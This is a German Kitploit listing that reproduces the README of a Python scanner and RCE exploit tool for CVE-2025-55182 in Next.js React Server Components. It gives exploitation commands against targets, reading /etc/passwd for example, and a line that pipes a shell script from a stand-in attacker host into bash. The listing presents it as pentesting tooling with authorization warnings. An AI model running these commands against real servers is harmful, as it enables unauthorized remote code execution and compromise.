Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Ein Python-basierter Sicherheitsscanner zum Erkennen und Ausnutzen von **React Server Components (RSC)**-Schwachstellen in **Next.js**-Anwendungen. Dieses Tool führt passive Erkennung, aktives Fingerprinting und RCE-Ausnutzungstests durch. | Kitploit
Tools/GitHubGitHub/mahaveer-choudhary/cve-2025-55182
SchwachstellenscannerCode-AnalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmahaveer-choudhary/cve-2025-55182

CVE-2025-55182

Ein Python-basierter Sicherheitsscanner zum Erkennen und Ausnutzen von **React Server Components (RSC)**-Schwachstellen in **Next.js**-Anwendungen. Dieses Tool führt passive Erkennung, aktives Fingerprinting und RCE-Ausnutzungstests durch.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

RSC Detector – React Server Components Schwachstellenscanner

Ein Python-basierter Sicherheitsscanner zum Erkennen und Ausnutzen von React Server Components (RSC)-Schwachstellen in Next.js-Anwendungen. Dieses Tool führt passive Erkennung, aktives Fingerprinting und RCE-Ausnutzungstests durch.

⚠️ WARNUNG: Dieses Tool ist nur für autorisierte Sicherheitstests bestimmt. Unautorisierter Zugriff auf Computersysteme ist illegal. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie testen.


Funktionen

✅ Passive Erkennung – Analysiert HTML, Header und Seitenstruktur auf RSC-Indikatoren
✅ Aktives Fingerprinting – Sendet RSC-spezifische Header, um Serverantworten zu erkennen
✅ HTTP-Header-Analyse – Identifiziert Next.js- und RSC-bezogene Header
✅ RCE-Ausnutzung – Führt Befehle auf anfälligen Servern aus (falls ausnutzbar)
✅ Farbige Terminalausgabe – Verbesserte visuelle Rückmeldung für bessere Lesbarkeit
✅ Interaktiver Modus – Mehrere Befehle im Ausnutzungsmodus ausführen
✅ Robuste Dekodierung – Verarbeitet gzip-komprimierte und binäre Payloads


Installation

Voraussetzungen

  • Python 3.8+
  • pip (Python-Paketmanager)

Einrichtung

  1. Repository klonen

    root@kitploit:~
    git clone https://github.com/mahaveer-choudhary/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Abhängigkeiten installieren

    root@kitploit:~
    pip install -r requirements.txt
    

    Erforderliche Pakete:

    • requests>=2.28.0 – HTTP-Client-Bibliothek
    • urllib3>=1.26.0 – Erweiterte HTTP-Dienstprogramme
    • colorama>=0.4.6 – Terminalfarben (Windows-kompatibel)
    • beautifulsoup4 – HTML-Parsing

Verwendung

Grundlegende Erkennung (ohne Ausnutzung)

root@kitploit:~
python rsc_detector.py https://example.com

Vollständiger Scan mit Ausnutzung

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Spezifischen Befehl ausführen

root@kitploit:~
python rsc_detector.py https://example.com --exploit --cmd "whoami"

Interaktiver Ausnutzungsmodus

root@kitploit:~
python rsc_detector.py https://example.com --exploit

Dann Befehle an der Eingabeaufforderung eingeben (mit quit beenden).


Befehlszeilenoptionen

OptionBeschreibung
<URL>Ziel-URL (erforderlich). Fehlt das Protokoll, wird automatisch https:// vorangestellt

Beispiele

RSC-Schwachstelle erkennen:

root@kitploit:~
python rsc_detector.py https://target.com

Ausnutzen und id-Befehl ausführen:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "id"

Ausnutzen und cat /etc/passwd ausführen:

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "cat /etc/passwd"

Interaktiver Modus (mehrere Befehle):

root@kitploit:~
python rsc_detector.py https://target.com --exploit

Funktionsweise

1. Passiver Scan

  • Prüft auf window.__next_f-Marker (Next.js App Router)
  • Erkennt text/x-component Content-Type
  • Sucht nach React-Flight-Protocol-Markern
  • Analysiert __NEXT_DATA__ und Next.js-Importe

2. Header-Analyse

  • Untersucht Server-, Vary- und X-Nextjs-Cache-Header
  • Identifiziert RSC-Bewusstsein in HTTP-Headern

3. Aktives Fingerprinting

  • Sendet Anfragen mit RSC: 1-Header
  • Analysiert Serverantwort auf RSC-spezifische Header
  • Erkennt React-Flight-Protocol-Struktur

4. RCE-Ausnutzung

  • Erstellt bösartiges JSON-Payload, das die Serialisierung von React Server Components ausnutzt
  • Sendet Multipart-Form-Data, um serverseitige Codeausführung auszulösen
  • Dekodiert base64-kodierte Befehlsausgaben
  • Unterstützt gzip-komprimierte Antworten

Ausgabe und Ergebnisse

Erkennungsergebnisse

root@kitploit:~
[*] Starting RSC Detection Scan on: https://example.com
====================================================================

[1] Running Passive Scan...
    Status: DETECTED
    Score: 80/100
    - Found: window.__next_f (App Router)

[2] Analyzing Headers...
    - Vary header includes RSC: ...

[3] Running Active Fingerprint...
    Status: DETECTED
    - Response Content-Type became text/x-component
    - Vary header contains 'RSC'

====================================================================

[FINAL RESULT] VULNERABLE
[!] This application appears to be vulnerable to RSC-based attacks!
    Consider: RCE exploitation may be possible

Ausnutzungsausgabe

root@kitploit:~
[*] Executing command: whoami
[+] Command executed successfully!
[OUTPUT]
root

Schwachstellendetails

CVE-2025-55182 nutzt Folgendes aus:

  • React Server Component (RSC)-Serialisierungsfehler
  • Next.js Server Action-Deserialisierungsschwachstellen
  • Objekt-Prototyp-Verschmutzung durch bösartige Payloads
  • Befehlseinschleusung über child_process.execSync()

Angriffsfläche

  • Next.js-Anwendungen, die den App Router verwenden
  • Serverkomponenten mit benutzergesteuerten Eingaben
  • Anwendungen mit aktiviertem, aber nicht ordnungsgemäß validiertem RSC

Rechtliche und ethische Richtlinien

⚠️ Wichtig

Dieses Tool ist AUSSCHLIESSLICH FÜR AUTORISIERTE SICHERHEITSTESTS:

  1. ✅ TUN: Verwenden Sie es auf Systemen, die Ihnen gehören oder für die Sie eine schriftliche Genehmigung haben
  2. ✅ TUN: Melden Sie Schwachstellen verantwortungsvoll an den Hersteller
  3. ✅ TUN: Befolgen Sie Praktiken der verantwortungsvollen Offenlegung
  4. ❌ NICHT TUN: Gegen Systeme ohne Autorisierung verwenden
  5. ❌ NICHT TUN: Für böswillige Zwecke verwenden
  6. ❌ NICHT TUN: Sensible Daten speichern oder ausführen

Unbefugter Computerzugriff ist illegal gemäß:

  • Computer Fraud and Abuse Act (CFAA) – USA
  • Computer Misuse Act 1990 – Großbritannien
  • Ähnlicher Gesetze in den meisten Ländern

Verantwortungsvolle Offenlegung

Wenn Sie mit diesem Tool eine Schwachstelle entdecken:

  1. NICHT öffentlich bekannt geben, bis der Hersteller einen Patch bereitgestellt hat
  2. Kontaktieren Sie das Sicherheitsteam des Herstellers direkt
  3. Gewähren Sie 90 Tage für die Patch-Entwicklung
  4. Koordinieren Sie den Zeitpunkt der Offenlegung mit dem Hersteller
  5. Nennen Sie sich nach der Offenlegung in Advisories

Fehlerbehebung

SSL-Zertifikatfehler

Das Tool ignoriert standardmäßig die SSL-Überprüfung. So aktivieren Sie sie:

root@kitploit:~
detector = RSCDetector(url, verify_ssl=True)

Base64-Dekodierungsfehler

Das Tool:

  • Fügt bei fehlerhaften base64-Zeichenfolgen Padding hinzu
  • Erkennt und dekomprimiert gzip-Payloads
  • Fallback auf UTF-8-Ersatzzeichen für Binärdaten

Kein "digest"-Schlüssel in der Antwort

  • Das Ziel ist möglicherweise nicht anfällig
  • Der Server filtert möglicherweise das Exploit-Payload
  • Versuchen Sie manuelle Tests oder andere Endpunkte

Timeout-Probleme

Timeout im Code erhöhen:

root@kitploit:~
response = self.session.get(self.url, timeout=30)  # 30 Sekunden

Projektstruktur

root@kitploit:~
CVE-2025-55182/
├── README.md                # Diese Datei
├── requirements.txt         # Python-Abhängigkeiten
├── rsc_detector.py         # Hauptscanner- und Exploit-Engine
├── rsc_cli.py              # CLI-Dienstprogramme (falls vorhanden)
├── script.py               # Zusätzliche Skripte (falls vorhanden)
├── COLOR_GUIDE.md          # Farbausgabe-Dokumentation
└── .gitignore              # Git-Ignore-Regeln

Abhängigkeiten

root@kitploit:~
requests>=2.28.0         # HTTP requests
urllib3>=1.26.0          # Advanced HTTP
beautifulsoup4>=4.11.0   # HTML parsing
colorama>=0.4.6          # Terminal colors (Windows)

Alle auf einmal installieren:

root@kitploit:~
pip install -r requirements.txt

Leistungstipps

  • Erkennung beschleunigen: --exploit-Flag weglassen, wenn nur gescannt wird
  • Batch-Tests: Skript zum Scannen mehrerer URLs erstellen
  • Netzwerk-Timeout: Timeout-Werte für langsame Netzwerke anpassen
  • SSL-Umgehung: Verifikation ist standardmäßig deaktiviert, um Flexibilität zu gewährleisten

Erweiterte Nutzung

Benutzerdefinierte Befehlsausführung

root@kitploit:~
python rsc_detector.py https://target.com --exploit --cmd "curl attacker.com/shell | bash"

Ausgabeumleitung

root@kitploit:~
python rsc_detector.py https://target.com > scan_results.txt 2>&1

Batch-Scannen

root@kitploit:~
for url in https://site1.com https://site2.com; do
    python rsc_detector.py "$url"
done

Einschränkungen

  • ⚠️ Funktioniert nur auf anfälligen Next.js-Konfigurationen
  • ⚠️ Erfordert aktiviertes RSC auf der Zielanwendung
  • ⚠️ Einige Server filtern oder blockieren Exploit-Payloads
  • ⚠️ Binärausgaben werden möglicherweise nicht korrekt im Terminal angezeigt
  • ⚠️ Befehlsausführung hängt von Serverberechtigungen ab

Mitwirken

Einen Fehler gefunden oder eine Verbesserung? Beiträge sind willkommen!

  1. Repository forken
  2. Funktionszweig erstellen (git checkout -b feature/verbesserung)
  3. Änderungen committen (git commit -am 'Feature hinzugefügt')
  4. In den Zweig pushen (git push origin feature/verbesserung)
  5. Pull-Request einreichen

Haftungsausschluss

root@kitploit:~
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
THE AUTHORS ASSUME NO LIABILITY FOR MISUSE OR UNAUTHORIZED ACCESS.
USE AT YOUR OWN RISK AND ONLY WITH PROPER AUTHORIZATION.

Lizenz

Dieses Projekt wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt.


Referenzen

  • React Server Components Dokumentation
  • Next.js App Router
  • CVE-2025-55182 (sobald verfügbar)
  • OWASP: Injection Flaws

Kontakt und Support

  • Schwachstellen melden: Verantwortungsvolle Offenlegung nutzen
  • Sicherheitsprobleme: Nicht öffentlich posten; die Betreiber direkt kontaktieren
  • Funktionswünsche: Ein Issue auf GitHub eröffnen

Autor

Erstellt für Sicherheitsforschung und autorisierte Penetrationstests.

Zuletzt aktualisiert: 19. Dezember 2025


Versionsverlauf

v1.0.0

  • ✅ Passive RSC-Erkennung
  • ✅ Aktives Fingerprinting
  • ✅ RCE-Ausnutzung
  • ✅ Farbige Terminalausgabe
  • ✅ Interaktiver Ausnutzungsmodus
  • ✅ Gzip-Dekomprimierungsunterstützung
  • ✅ Robuste Base64-Dekodierung

Denken Sie daran: Mit großer Macht kommt große Verantwortung. Verwenden Sie dieses Tool ethisch und legal.

Tool herunterladen
--exploit
RCE-Ausnutzung nach der Erkennung aktivieren
--cmd <Befehl>Einen spezifischen Befehl ausführen (zusammen mit --exploit)